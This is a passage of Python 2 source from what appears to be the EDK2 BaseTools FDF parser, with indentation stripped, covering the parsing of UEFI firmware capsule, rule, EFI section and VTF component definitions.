CompressSectionObj.Alignment = AlignValue
CompressSectionObj.CompType = type
# Recursive sections...
while True:
IsLeafSection = self.__GetLeafSection(CompressSectionObj)
IsEncapSection = self.__GetEncapsulationSec(CompressSectionObj)
if not IsLeafSection and not IsEncapSection:
break
if not self.__IsToken( "}"):
raise Warning("expected '}' At Line ", self.FileName, self.CurrentLineNumber)
Obj.SectionList.append(CompressSectionObj)
# else:
# raise Warning("Compress type not known At Line ")
return True
elif self.__IsKeyword( "GUIDED"):
GuidValue = None
if self.__GetNextGuid():
GuidValue = self.__Token
AttribDict = self.__GetGuidAttrib()
if not self.__IsToken("{"):
raise Warning("expected '{' At Line ", self.FileName, self.CurrentLineNumber)
GuidSectionObj = CommonDataClass.FdfClass.GuidSectionClassObject()
GuidSectionObj.Alignment = AlignValue
GuidSectionObj.NameGuid = GuidValue
GuidSectionObj.SectionType = "GUIDED"
GuidSectionObj.ProcessRequired = AttribDict["PROCESSING_REQUIRED"]
GuidSectionObj.AuthStatusValid = AttribDict["AUTH_STATUS_VALID"]
# Recursive sections...
while True:
IsLeafSection = self.__GetLeafSection(GuidSectionObj)
IsEncapSection = self.__GetEncapsulationSec(GuidSectionObj)
if not IsLeafSection and not IsEncapSection:
break
if not self.__IsToken( "}"):
raise Warning("expected '}' At Line ", self.FileName, self.CurrentLineNumber)
Obj.SectionList.append(GuidSectionObj)
return True
return False
## __GetGuidAttrib() method
#
# Get attributes for GUID section
#
# @param self The object pointer
# @retval AttribDict Dictionary of key-value pair of section attributes
#
def __GetGuidAttrib(self):
AttribDict = {}
AttribDict["PROCESSING_REQUIRED"] = False
AttribDict["AUTH_STATUS_VALID"] = False
if self.__IsKeyword("PROCESSING_REQUIRED") or self.__IsKeyword("AUTH_STATUS_VALID"):
AttribKey = self.__Token
if not self.__IsToken("="):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextToken() or self.__Token.upper() not in ("TRUE", "FALSE", "1", "0"):
raise Warning("expected TRUE/FALSE (1/0) At Line ", self.FileName, self.CurrentLineNumber)
AttribDict[AttribKey] = self.__Token
if self.__IsKeyword("PROCESSING_REQUIRED") or self.__IsKeyword("AUTH_STATUS_VALID"):
AttribKey = self.__Token
if not self.__IsToken("="):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextToken() or self.__Token.upper() not in ("TRUE", "FALSE", "1", "0"):
raise Warning("expected TRUE/FALSE (1/0) At Line ", self.FileName, self.CurrentLineNumber)
AttribDict[AttribKey] = self.__Token
return AttribDict
## __GetEncapsulationSec() method
#
# Get encapsulation section for FILE
#
# @param self The object pointer
# @param FfsFile for whom section is got
# @retval True Successfully find section statement
# @retval False Not able to find section statement
#
def __GetEncapsulationSec(self, FfsFileObj):
OldPos = self.GetFileBufferPos()
if not self.__IsKeyword( "SECTION"):
if len(FfsFileObj.SectionList) == 0:
raise Warning("expected SECTION At Line ", self.FileName, self.CurrentLineNumber)
else:
return False
AlignValue = None
if self.__GetAlignment():
if self.__Token not in ("8", "16", "32", "64", "128", "512", "1K", "4K", "32K" ,"64K"):
raise Warning("Incorrect alignment '%s'" % self.__Token, self.FileName, self.CurrentLineNumber)
AlignValue = self.__Token
if not self.__GetCglSection(FfsFileObj, AlignValue):
self.SetFileBufferPos(OldPos)
return False
else:
return True
## __GetCapsule() method
#
# Get capsule section contents and store its data into capsule list of self.Profile
#
# @param self The object pointer
# @retval True Successfully find a capsule
# @retval False Not able to find a capsule
#
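# Illustrative [Capsule.] section of the kind this method accepts (the capsule
# name, GUID and FV name are placeholders):
#   [Capsule.SampleCapsule]
#   CAPSULE_GUID = 11111111-2222-3333-4444-555555555555
#   FV = FvMain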
def __GetCapsule(self):
if not self.__GetNextToken():
return False
S = self.__Token.upper()
if S.startswith("[") and not S.startswith("[CAPSULE."):
if not S.startswith("[VTF.") and not S.startswith("[RULE.") and not S.startswith("[OPTIONROM."):
raise Warning("Unknown section, or the section appears out of sequence (the correct sequence is [FD.], [FV.], [Capsule.], [VTF.], [Rule.], [OptionRom.])", self.FileName, self.CurrentLineNumber)
self.__UndoToken()
return False
self.__UndoToken()
if not self.__IsToken("[CAPSULE.", True):
FileLineTuple = GetRealFileLine(self.FileName, self.CurrentLineNumber)
print 'Parsing String: %s in File %s, At line: %d, Offset Within Line: %d' \
% (self.Profile.FileLinesList[self.CurrentLineNumber - 1][self.CurrentOffsetWithinLine :], FileLineTuple[0], FileLineTuple[1], self.CurrentOffsetWithinLine)
raise Warning("expected [Capsule.] At Line ", self.FileName, self.CurrentLineNumber)
CapsuleObj = CommonDataClass.FdfClass.CapsuleClassObject()
CapsuleName = self.__GetUiName()
if not CapsuleName:
raise Warning("expected capsule name At line ", self.FileName, self.CurrentLineNumber)
CapsuleObj.UiCapsuleName = CapsuleName.upper()
if not self.__IsToken( "]"):
raise Warning("expected ']' At Line ", self.FileName, self.CurrentLineNumber)
if self.__IsKeyword("CREATE_FILE"):
if not self.__IsToken( "="):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextToken():
raise Warning("expected file name At Line ", self.FileName, self.CurrentLineNumber)
CapsuleObj.CreateFile = self.__Token
self.__GetCapsuleStatements(CapsuleObj)
self.Profile.CapsuleList.append(CapsuleObj)
return True
## __GetCapsuleStatements() method
#
# Get statements for capsule
#
# @param self The object pointer
# @param Obj for whom statements are got
#
def __GetCapsuleStatements(self, Obj):
self.__GetCapsuleTokens(Obj)
self.__GetDefineStatements(Obj)
self.__GetSetStatements(Obj)
self.__GetCapsuleData(Obj)
## __GetCapsuleTokens() method
#
# Get token statements for capsule
#
# @param self The object pointer
# @param Obj for whom token statements are got
#
def __GetCapsuleTokens(self, Obj):
if not self.__IsKeyword("CAPSULE_GUID"):
raise Warning("expected 'CAPSULE_GUID' At Line ", self.FileName, self.CurrentLineNumber)
while self.__CurrentLine().find("=") != -1:
NameValue = self.__CurrentLine().split("=")
Obj.TokensDict[NameValue[0].strip()] = NameValue[1].strip()
self.CurrentLineNumber += 1
self.CurrentOffsetWithinLine = 0
## __GetCapsuleData() method
#
# Get capsule data for capsule
#
# @param self The object pointer
# @param Obj for whom capsule data are got
#
def __GetCapsuleData(self, Obj):
while True:
IsInf = self.__GetInfStatement(Obj, True)
IsFile = self.__GetFileStatement(Obj, True)
IsFv = self.__GetFvStatement(Obj)
if not IsInf and not IsFile and not IsFv:
break
## __GetFvStatement() method
#
# Get FV for capsule
#
# @param self The object pointer
# @param CapsuleObj for whom FV is got
# @retval True Successfully find a FV statement
# @retval False Not able to find a FV statement
#
def __GetFvStatement(self, CapsuleObj):
if not self.__IsKeyword("FV"):
return False
if not self.__IsToken("="):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextToken():
raise Warning("expected FV name At Line ", self.FileName, self.CurrentLineNumber)
# CapsuleFv = CapsuleData.CapsuleFv()
# CapsuleFv.FvName = self.__Token
# CapsuleObj.CapsuleDataList.append(CapsuleFv)
return True
## __GetRule() method
#
# Get Rule section contents and store its data into rule list of self.Profile
#
# @param self The object pointer
# @retval True Successfully find a Rule
# @retval False Not able to find a Rule
#
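# Illustrative [Rule.] section of the kind this method accepts (it uses the
# usual $(NAMED_GUID)/$(INF_OUTPUT)/$(MODULE_NAME) build macros; the section
# list itself is a placeholder):
#   [Rule.Common.DXE_DRIVER]
#   FILE DRIVER = $(NAMED_GUID) {
#     PE32 PE32 $(INF_OUTPUT)/$(MODULE_NAME).efi
#     UI STRING = "$(MODULE_NAME)" Optional
#   }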
def __GetRule(self):
if not self.__GetNextToken():
return False
S = self.__Token.upper()
if S.startswith("[") and not S.startswith("[RULE."):
if not S.startswith("[OPTIONROM."):
raise Warning("Unknown section, or the section appears out of sequence (the correct sequence is [FD.], [FV.], [Capsule.], [VTF.], [Rule.], [OptionRom.])", self.FileName, self.CurrentLineNumber)
self.__UndoToken()
return False
self.__UndoToken()
if not self.__IsToken("[Rule.", True):
FileLineTuple = GetRealFileLine(self.FileName, self.CurrentLineNumber)
print 'Parsing String: %s in File %s, At line: %d, Offset Within Line: %d' \
% (self.Profile.FileLinesList[self.CurrentLineNumber - 1][self.CurrentOffsetWithinLine :], FileLineTuple[0], FileLineTuple[1], self.CurrentOffsetWithinLine)
raise Warning("expected [Rule.] At Line ", self.FileName, self.CurrentLineNumber)
if not self.__SkipToToken("."):
raise Warning("expected '.' At Line ", self.FileName, self.CurrentLineNumber)
Arch = self.__SkippedChars.rstrip(".")
if Arch.upper() not in ("IA32", "X64", "IPF", "EBC", "ARM", "AARCH64", "COMMON"):
raise Warning("Unknown Arch '%s'" % Arch, self.FileName, self.CurrentLineNumber)
ModuleType = self.__GetModuleType()
TemplateName = ""
if self.__IsToken("."):
if not self.__GetNextWord():
raise Warning("expected template name At Line ", self.FileName, self.CurrentLineNumber)
TemplateName = self.__Token
if not self.__IsToken( "]"):
raise Warning("expected ']' At Line ", self.FileName, self.CurrentLineNumber)
RuleObj = self.__GetRuleFileStatements()
RuleObj.Arch = Arch.upper()
RuleObj.ModuleType = ModuleType
RuleObj.TemplateName = TemplateName
if TemplateName == '' :
self.Profile.RuleDict['RULE' + \
'.' + \
Arch.upper() + \
'.' + \
ModuleType.upper() ] = RuleObj
else :
self.Profile.RuleDict['RULE' + \
'.' + \
Arch.upper() + \
'.' + \
ModuleType.upper() + \
'.' + \
TemplateName.upper() ] = RuleObj
# self.Profile.RuleList.append(rule)
return True
## __GetModuleType() method
#
# Return the module type
#
# @param self The object pointer
# @retval string module type
#
def __GetModuleType(self):
if not self.__GetNextWord():
raise Warning("expected Module type At Line ", self.FileName, self.CurrentLineNumber)
if self.__Token.upper() not in ("SEC", "PEI_CORE", "PEIM", "DXE_CORE", \
"DXE_DRIVER", "DXE_SAL_DRIVER", \
"DXE_SMM_DRIVER", "DXE_RUNTIME_DRIVER", \
"UEFI_DRIVER", "UEFI_APPLICATION", "USER_DEFINED", "DEFAULT", "BASE", \
"SECURITY_CORE", "COMBINED_PEIM_DRIVER", "PIC_PEIM", "RELOCATABLE_PEIM", \
"PE32_PEIM", "BS_DRIVER", "RT_DRIVER", "SAL_RT_DRIVER", "APPLICATION", "ACPITABLE", "SMM_CORE"):
raise Warning("Unknown Module type At line ", self.FileName, self.CurrentLineNumber)
return self.__Token
## __GetFileExtension() method
#
# Return the file extension
#
# @param self The object pointer
# @retval string file name extension
#
def __GetFileExtension(self):
if not self.__IsToken("."):
raise Warning("expected '.' At Line ", self.FileName, self.CurrentLineNumber)
Ext = ""
if self.__GetNextToken():
Pattern = re.compile(r'([a-zA-Z][a-zA-Z0-9]*)')
if Pattern.match(self.__Token):
Ext = self.__Token
return '.' + Ext
else:
raise Warning("Unknown file extension At Line ", self.FileName, self.CurrentLineNumber)
else:
raise Warning("expected file extension At Line ", self.FileName, self.CurrentLineNumber)
## __GetRuleFileStatements() method
#
# Get rule contents
#
# @param self The object pointer
# @retval Rule Rule object
#
def __GetRuleFileStatements(self):
if not self.__IsKeyword("FILE"):
raise Warning("expected FILE At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextWord():
raise Warning("expected FFS type At Line ", self.FileName, self.CurrentLineNumber)
Type = self.__Token.strip().upper()
if Type not in ("RAW", "FREEFORM", "SEC", "PEI_CORE", "PEIM",\
"PEI_DXE_COMBO", "DRIVER", "DXE_CORE", "APPLICATION", "FV_IMAGE", "SMM", "SMM_CORE"):
raise Warning("Unknown FFS type At line ", self.FileName, self.CurrentLineNumber)
if not self.__IsToken("="):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__IsKeyword("$(NAMED_GUID)"):
if not self.__GetNextWord():
raise Warning("expected $(NAMED_GUID)", self.FileName, self.CurrentLineNumber)
if self.__Token == 'PCD':
if not self.__IsToken( "("):
raise Warning("expected '('", self.FileName, self.CurrentLineNumber)
PcdPair = self.__GetNextPcdName()
if not self.__IsToken( ")"):
raise Warning("expected ')'", self.FileName, self.CurrentLineNumber)
self.__Token = 'PCD('+PcdPair[1]+'.'+PcdPair[0]+')'
NameGuid = self.__Token
KeepReloc = None
if self.__IsKeyword('RELOCS_STRIPPED') or self.__IsKeyword('RELOCS_RETAINED'):
if self.__FileCouldHaveRelocFlag(Type):
if self.__Token == 'RELOCS_STRIPPED':
KeepReloc = False
else:
KeepReloc = True
else:
raise Warning("File type %s could not have reloc strip flag At Line %d" % (Type, self.CurrentLineNumber), self.FileName, self.CurrentLineNumber)
KeyStringList = []
if self.__GetNextToken():
Pattern = re.compile(r'([a-zA-Z0-9\-]+|\$\(TARGET\)|\*)_([a-zA-Z0-9\-]+|\$\(TOOL_CHAIN_TAG\)|\*)_([a-zA-Z0-9\-]+|\$\(ARCH\)|\*)')
if Pattern.match(self.__Token):
KeyStringList.append(self.__Token)
if self.__IsToken(","):
while self.__GetNextToken():
if not Pattern.match(self.__Token):
raise Warning("expected KeyString \"Target_Tag_Arch\" At Line ", self.FileName, self.CurrentLineNumber)
KeyStringList.append(self.__Token)
if not self.__IsToken(","):
break
else:
self.__UndoToken()
Fixed = False
if self.__IsKeyword("Fixed", True):
Fixed = True
CheckSum = False
if self.__IsKeyword("CheckSum", True):
CheckSum = True
AlignValue = ""
if self.__GetAlignment():
if self.__Token not in ("Auto", "8", "16", "32", "64", "128", "512", "1K", "4K", "32K" ,"64K"):
raise Warning("Incorrect alignment At Line ", self.FileName, self.CurrentLineNumber)
AlignValue = self.__Token
if self.__IsToken("{"):
# Complex file rule expected
Rule = RuleComplexFile.RuleComplexFile()
Rule.FvFileType = Type
Rule.NameGuid = NameGuid
Rule.Alignment = AlignValue
Rule.CheckSum = CheckSum
Rule.Fixed = Fixed
Rule.KeyStringList = KeyStringList
if KeepReloc != None:
Rule.KeepReloc = KeepReloc
while True:
IsEncapsulate = self.__GetRuleEncapsulationSection(Rule)
IsLeaf = self.__GetEfiSection(Rule)
if not IsEncapsulate and not IsLeaf:
break
if not self.__IsToken("}"):
raise Warning("expected '}' At Line ", self.FileName, self.CurrentLineNumber)
return Rule
elif self.__IsToken("|"):
# Ext rule expected
Ext = self.__GetFileExtension()
Rule = RuleSimpleFile.RuleSimpleFile()
Rule.FvFileType = Type
Rule.NameGuid = NameGuid
Rule.Alignment = AlignValue
Rule.CheckSum = CheckSum
Rule.Fixed = Fixed
Rule.FileExtension = Ext
Rule.KeyStringList = KeyStringList
if KeepReloc != None:
Rule.KeepReloc = KeepReloc
return Rule
else:
# Simple file rule expected
if not self.__GetNextWord():
raise Warning("expected leaf section type At Line ", self.FileName, self.CurrentLineNumber)
SectionName = self.__Token
if SectionName not in ("COMPAT16", "PE32", "PIC", "TE", "FV_IMAGE", "RAW", "DXE_DEPEX",\
"UI", "PEI_DEPEX", "VERSION", "SUBTYPE_GUID", "SMM_DEPEX"):
raise Warning("Unknown leaf section name '%s'" % SectionName, self.FileName, self.CurrentLineNumber)
if self.__IsKeyword("Fixed", True):
Fixed = True
if self.__IsKeyword("CheckSum", True):
CheckSum = True
if self.__GetAlignment():
if self.__Token not in ("Auto", "8", "16", "32", "64", "128", "512", "1K", "4K", "32K" ,"64K"):
raise Warning("Incorrect alignment At Line ", self.FileName, self.CurrentLineNumber)
if self.__Token == 'Auto' and (not SectionName == 'PE32') and (not SectionName == 'TE'):
raise Warning("Auto alignment can only be used in PE32 or TE section ", self.FileName, self.CurrentLineNumber)
AlignValue = self.__Token
if not self.__GetNextToken():
raise Warning("expected File name At Line ", self.FileName, self.CurrentLineNumber)
Rule = RuleSimpleFile.RuleSimpleFile()
Rule.SectionType = SectionName
Rule.FvFileType = Type
Rule.NameGuid = NameGuid
Rule.Alignment = AlignValue
Rule.CheckSum = CheckSum
Rule.Fixed = Fixed
Rule.FileName = self.__Token
Rule.KeyStringList = KeyStringList
if KeepReloc != None:
Rule.KeepReloc = KeepReloc
return Rule
## __GetEfiSection() method
#
# Get section list for Rule
#
# @param self The object pointer
# @param Obj for whom section is got
# @retval True Successfully find section statement
# @retval False Not able to find section statement
#
def __GetEfiSection(self, Obj):
OldPos = self.GetFileBufferPos()
if not self.__GetNextWord():
return False
SectionName = self.__Token
if SectionName not in ("COMPAT16", "PE32", "PIC", "TE", "FV_IMAGE", "RAW", "DXE_DEPEX",\
"UI", "VERSION", "PEI_DEPEX", "GUID", "SMM_DEPEX"):
self.__UndoToken()
return False
if SectionName == "FV_IMAGE":
FvImageSectionObj = FvImageSection.FvImageSection()
if self.__IsKeyword("FV_IMAGE"):
pass
if self.__IsToken( "{"):
FvObj = Fv.FV()
self.__GetDefineStatements(FvObj)
self.__GetBlockStatement(FvObj)
self.__GetSetStatements(FvObj)
self.__GetFvAlignment(FvObj)
self.__GetFvAttributes(FvObj)
self.__GetAprioriSection(FvObj)
self.__GetAprioriSection(FvObj)
while True:
IsInf = self.__GetInfStatement(FvObj)
IsFile = self.__GetFileStatement(FvObj)
if not IsInf and not IsFile:
break
if not self.__IsToken( "}"):
raise Warning("expected '}' At Line ", self.FileName, self.CurrentLineNumber)
FvImageSectionObj.Fv = FvObj
FvImageSectionObj.FvName = None
else:
if not self.__IsKeyword("FV"):
raise Warning("expected 'FV' At Line ", self.FileName, self.CurrentLineNumber)
FvImageSectionObj.FvFileType = self.__Token
if self.__GetAlignment():
if self.__Token not in ("8", "16", "32", "64", "128", "512", "1K", "4K", "32K" ,"64K"):
raise Warning("Incorrect alignment At Line ", self.FileName, self.CurrentLineNumber)
FvImageSectionObj.Alignment = self.__Token
if self.__IsToken('|'):
FvImageSectionObj.FvFileExtension = self.__GetFileExtension()
elif self.__GetNextToken():
if self.__Token not in ("}", "COMPAT16", "PE32", "PIC", "TE", "FV_IMAGE", "RAW", "DXE_DEPEX",\
"UI", "VERSION", "PEI_DEPEX", "GUID", "SMM_DEPEX"):
FvImageSectionObj.FvFileName = self.__Token
else:
self.__UndoToken()
else:
raise Warning("expected FV file name At Line ", self.FileName, self.CurrentLineNumber)
Obj.SectionList.append(FvImageSectionObj)
return True
EfiSectionObj = EfiSection.EfiSection()
EfiSectionObj.SectionType = SectionName
if not self.__GetNextToken():
raise Warning("expected file type At Line ", self.FileName, self.CurrentLineNumber)
if self.__Token == "STRING":
if not self.__RuleSectionCouldHaveString(EfiSectionObj.SectionType):
raise Warning("%s section could NOT have string data At Line %d" % (EfiSectionObj.SectionType, self.CurrentLineNumber), self.FileName, self.CurrentLineNumber)
if not self.__IsToken('='):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextToken():
raise Warning("expected Quoted String At Line ", self.FileName, self.CurrentLineNumber)
if self.__GetStringData():
EfiSectionObj.StringData = self.__Token
if self.__IsKeyword("BUILD_NUM"):
if not self.__RuleSectionCouldHaveBuildNum(EfiSectionObj.SectionType):
raise Warning("%s section could NOT have BUILD_NUM At Line %d" % (EfiSectionObj.SectionType, self.CurrentLineNumber), self.FileName, self.CurrentLineNumber)
if not self.__IsToken("="):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextToken():
raise Warning("expected Build number At Line ", self.FileName, self.CurrentLineNumber)
EfiSectionObj.BuildNum = self.__Token
else:
EfiSectionObj.FileType = self.__Token
self.__CheckRuleSectionFileType(EfiSectionObj.SectionType, EfiSectionObj.FileType)
if self.__IsKeyword("Optional"):
if not self.__RuleSectionCouldBeOptional(EfiSectionObj.SectionType):
raise Warning("%s section could NOT be optional At Line %d" % (EfiSectionObj.SectionType, self.CurrentLineNumber), self.FileName, self.CurrentLineNumber)
EfiSectionObj.Optional = True
if self.__IsKeyword("BUILD_NUM"):
if not self.__RuleSectionCouldHaveBuildNum(EfiSectionObj.SectionType):
raise Warning("%s section could NOT have BUILD_NUM At Line %d" % (EfiSectionObj.SectionType, self.CurrentLineNumber), self.FileName, self.CurrentLineNumber)
if not self.__IsToken("="):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextToken():
raise Warning("expected Build number At Line ", self.FileName, self.CurrentLineNumber)
EfiSectionObj.BuildNum = self.__Token
if self.__GetAlignment():
if self.__Token not in ("Auto", "8", "16", "32", "64", "128", "512", "1K", "4K", "32K" ,"64K"):
raise Warning("Incorrect alignment '%s'" % self.__Token, self.FileName, self.CurrentLineNumber)
if self.__Token == 'Auto' and (not SectionName == 'PE32') and (not SectionName == 'TE'):
raise Warning("Auto alignment can only be used in PE32 or TE section ", self.FileName, self.CurrentLineNumber)
EfiSectionObj.Alignment = self.__Token
if self.__IsKeyword('RELOCS_STRIPPED') or self.__IsKeyword('RELOCS_RETAINED'):
if self.__SectionCouldHaveRelocFlag(EfiSectionObj.SectionType):
if self.__Token == 'RELOCS_STRIPPED':
EfiSectionObj.KeepReloc = False
else:
EfiSectionObj.KeepReloc = True
if Obj.KeepReloc != None and Obj.KeepReloc != EfiSectionObj.KeepReloc:
raise Warning("Section type %s has reloc strip flag conflict with Rule At Line %d" % (EfiSectionObj.SectionType, self.CurrentLineNumber), self.FileName, self.CurrentLineNumber)
else:
raise Warning("Section type %s could not have reloc strip flag At Line %d" % (EfiSectionObj.SectionType, self.CurrentLineNumber), self.FileName, self.CurrentLineNumber)
if self.__IsToken('|'):
EfiSectionObj.FileExtension = self.__GetFileExtension()
elif self.__GetNextToken():
if self.__Token not in ("}", "COMPAT16", "PE32", "PIC", "TE", "FV_IMAGE", "RAW", "DXE_DEPEX",\
"UI", "VERSION", "PEI_DEPEX", "GUID", "SMM_DEPEX"):
if self.__Token.startswith('PCD'):
self.__UndoToken()
self.__GetNextWord()
if self.__Token == 'PCD':
if not self.__IsToken( "("):
raise Warning("expected '('", self.FileName, self.CurrentLineNumber)
PcdPair = self.__GetNextPcdName()
if not self.__IsToken( ")"):
raise Warning("expected ')'", self.FileName, self.CurrentLineNumber)
self.__Token = 'PCD('+PcdPair[1]+'.'+PcdPair[0]+')'
EfiSectionObj.FileName = self.__Token
else:
self.__UndoToken()
else:
raise Warning("expected section file name At Line ", self.FileName, self.CurrentLineNumber)
Obj.SectionList.append(EfiSectionObj)
return True
## __RuleSectionCouldBeOptional() method
#
# Get whether a section could be optional
#
# @param self The object pointer
# @param SectionType The section type to check
# @retval True section could be optional
# @retval False section never optional
#
def __RuleSectionCouldBeOptional(self, SectionType):
if SectionType in ("DXE_DEPEX", "UI", "VERSION", "PEI_DEPEX", "RAW", "SMM_DEPEX"):
return True
else:
return False
## __RuleSectionCouldHaveBuildNum() method
#
# Get whether a section could have build number information
#
# @param self The object pointer
# @param SectionType The section type to check
# @retval True section could have build number information
# @retval False section never have build number information
#
def __RuleSectionCouldHaveBuildNum(self, SectionType):
if SectionType in ("VERSION",):
return True
else:
return False
## __RuleSectionCouldHaveString() method
#
# Get whether a section could have string
#
# @param self The object pointer
# @param SectionType The section type to check
# @retval True section could have string
# @retval False section never have string
#
def __RuleSectionCouldHaveString(self, SectionType):
if SectionType in ("UI", "VERSION"):
return True
else:
return False
## __CheckRuleSectionFileType() method
#
# Get whether a section matches a file type
#
# @param self The object pointer
# @param SectionType The section type to check
# @param FileType The file type to check
#
def __CheckRuleSectionFileType(self, SectionType, FileType):
if SectionType == "COMPAT16":
if FileType not in ("COMPAT16", "SEC_COMPAT16"):
raise Warning("Incorrect section file type At Line ", self.FileName, self.CurrentLineNumber)
elif SectionType == "PE32":
if FileType not in ("PE32", "SEC_PE32"):
raise Warning("Incorrect section file type At Line ", self.FileName, self.CurrentLineNumber)
elif SectionType == "PIC":
if FileType not in ("PIC",):
raise Warning("Incorrect section file type At Line ", self.FileName, self.CurrentLineNumber)
elif SectionType == "TE":
if FileType not in ("TE", "SEC_TE"):
raise Warning("Incorrect section file type At Line ", self.FileName, self.CurrentLineNumber)
elif SectionType == "RAW":
if FileType not in ("BIN", "SEC_BIN", "RAW", "ASL", "ACPI"):
raise Warning("Incorrect section file type At Line ", self.FileName, self.CurrentLineNumber)
elif SectionType == "DXE_DEPEX" or SectionType == "SMM_DEPEX":
if FileType not in ("DXE_DEPEX", "SEC_DXE_DEPEX", "SMM_DEPEX"):
raise Warning("Incorrect section file type At Line ", self.FileName, self.CurrentLineNumber)
elif SectionType == "UI":
if FileType not in ("UI", "SEC_UI"):
raise Warning("Incorrect section file type At Line ", self.FileName, self.CurrentLineNumber)
elif SectionType == "VERSION":
if FileType not in ("VERSION", "SEC_VERSION"):
raise Warning("Incorrect section file type At Line ", self.FileName, self.CurrentLineNumber)
elif SectionType == "PEI_DEPEX":
if FileType not in ("PEI_DEPEX", "SEC_PEI_DEPEX"):
raise Warning("Incorrect section file type At Line ", self.FileName, self.CurrentLineNumber)
elif SectionType == "GUID":
if FileType not in ("PE32", "SEC_GUID"):
raise Warning("Incorrect section file type At Line ", self.FileName, self.CurrentLineNumber)
## __GetRuleEncapsulationSection() method
#
# Get encapsulation section for Rule
#
# @param self The object pointer
# @param Rule for whom section is got
# @retval True Successfully find section statement
# @retval False Not able to find section statement
#
def __GetRuleEncapsulationSection(self, Rule):
if self.__IsKeyword( "COMPRESS"):
Type = "PI_STD"
if self.__IsKeyword("PI_STD") or self.__IsKeyword("PI_NONE"):
Type = self.__Token
if not self.__IsToken("{"):
raise Warning("expected '{' At Line ", self.FileName, self.CurrentLineNumber)
CompressSectionObj = CompressSection.CompressSection()
CompressSectionObj.CompType = Type
# Recursive sections...
while True:
IsEncapsulate = self.__GetRuleEncapsulationSection(CompressSectionObj)
IsLeaf = self.__GetEfiSection(CompressSectionObj)
if not IsEncapsulate and not IsLeaf:
break
if not self.__IsToken( "}"):
raise Warning("expected '}' At Line ", self.FileName, self.CurrentLineNumber)
Rule.SectionList.append(CompressSectionObj)
return True
elif self.__IsKeyword( "GUIDED"):
GuidValue = None
if self.__GetNextGuid():
GuidValue = self.__Token
if self.__IsKeyword( "$(NAMED_GUID)"):
GuidValue = self.__Token
AttribDict = self.__GetGuidAttrib()
if not self.__IsToken("{"):
raise Warning("expected '{' At Line ", self.FileName, self.CurrentLineNumber)
GuidSectionObj = GuidSection.GuidSection()
GuidSectionObj.NameGuid = GuidValue
GuidSectionObj.SectionType = "GUIDED"
GuidSectionObj.ProcessRequired = AttribDict["PROCESSING_REQUIRED"]
GuidSectionObj.AuthStatusValid = AttribDict["AUTH_STATUS_VALID"]
# Efi sections...
while True:
IsEncapsulate = self.__GetRuleEncapsulationSection(GuidSectionObj)
IsLeaf = self.__GetEfiSection(GuidSectionObj)
if not IsEncapsulate and not IsLeaf:
break
if not self.__IsToken( "}"):
raise Warning("expected '}' At Line ", self.FileName, self.CurrentLineNumber)
Rule.SectionList.append(GuidSectionObj)
return True
return False
## __GetVtf() method
#
# Get VTF section contents and store its data into VTF list of self.Profile
#
# @param self The object pointer
# @retval True Successfully find a VTF
# @retval False Not able to find a VTF
#
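# Illustrative [VTF.] section of the kind this method accepts (the names and
# the binary path are placeholders):
#   [VTF.IA32.SampleVtf]
#   COMP_NAME = SampleComp
#   COMP_LOC  = F
#   COMP_TYPE = FIT
#   COMP_VER  = -
#   COMP_CS   = 1
#   COMP_BIN  = Bin/SampleComp.bin
#   COMP_SYM  = -
#   COMP_SIZE = -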
def __GetVtf(self):
if not self.__GetNextToken():
return False
S = self.__Token.upper()
if S.startswith("[") and not S.startswith("[VTF."):
if not S.startswith("[RULE.") and not S.startswith("[OPTIONROM."):
raise Warning("Unknown section, or the section appears out of sequence (the correct sequence is [FD.], [FV.], [Capsule.], [VTF.], [Rule.], [OptionRom.])", self.FileName, self.CurrentLineNumber)
self.__UndoToken()
return False
self.__UndoToken()
if not self.__IsToken("[VTF.", True):
FileLineTuple = GetRealFileLine(self.FileName, self.CurrentLineNumber)
print 'Parsing String: %s in File %s, At line: %d, Offset Within Line: %d' \
% (self.Profile.FileLinesList[self.CurrentLineNumber - 1][self.CurrentOffsetWithinLine :], FileLineTuple[0], FileLineTuple[1], self.CurrentOffsetWithinLine)
raise Warning("expected [VTF.] At Line ", self.FileName, self.CurrentLineNumber)
if not self.__SkipToToken("."):
raise Warning("expected '.' At Line ", self.FileName, self.CurrentLineNumber)
Arch = self.__SkippedChars.rstrip(".").upper()
if Arch not in ("IA32", "X64", "IPF", "ARM", "AARCH64"):
raise Warning("Unknown Arch At line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextWord():
raise Warning("expected VTF name At Line ", self.FileName, self.CurrentLineNumber)
Name = self.__Token.upper()
VtfObj = Vtf.Vtf()
VtfObj.UiName = Name
VtfObj.KeyArch = Arch
if self.__IsToken(","):
if not self.__GetNextWord():
raise Warning("expected Arch list At Line ", self.FileName, self.CurrentLineNumber)
if self.__Token.upper() not in ("IA32", "X64", "IPF", "ARM", "AARCH64"):
raise Warning("Unknown Arch At line ", self.FileName, self.CurrentLineNumber)
VtfObj.ArchList = self.__Token.upper()
if not self.__IsToken( "]"):
raise Warning("expected ']' At Line ", self.FileName, self.CurrentLineNumber)
if self.__IsKeyword("IA32_RST_BIN"):
if not self.__IsToken("="):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextToken():
raise Warning("expected Reset file At Line ", self.FileName, self.CurrentLineNumber)
VtfObj.ResetBin = self.__Token
while self.__GetComponentStatement(VtfObj):
pass
self.Profile.VtfList.append(VtfObj)
return True
## __GetComponentStatement() method
#
# Get components in VTF
#
# @param self The object pointer
# @param VtfObj for whom component is got
# @retval True Successfully find a component
# @retval False Not able to find a component
#
def __GetComponentStatement(self, VtfObj):
if not self.__IsKeyword("COMP_NAME"):
return False
if not self.__IsToken("="):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextWord():
raise Warning("expected Component Name At Line ", self.FileName, self.CurrentLineNumber)
CompStatementObj = ComponentStatement.ComponentStatement()
CompStatementObj.CompName = self.__Token
